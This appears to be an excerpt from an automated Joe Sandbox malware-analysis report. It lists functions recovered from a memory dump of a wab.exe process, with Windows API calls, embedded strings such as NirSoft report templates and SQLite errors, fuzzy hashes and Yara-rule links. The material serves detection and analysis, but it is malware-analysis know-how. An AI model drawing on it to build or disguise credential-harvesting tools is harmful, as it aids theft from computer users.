                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                                                                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                          • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                                                                                          • String ID: PD$PD
                                                                                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                                                                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 239872665-3916222277
                                                                                                                                                                                          • Opcode ID: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                          • Opcode Fuzzy Hash: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                          • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
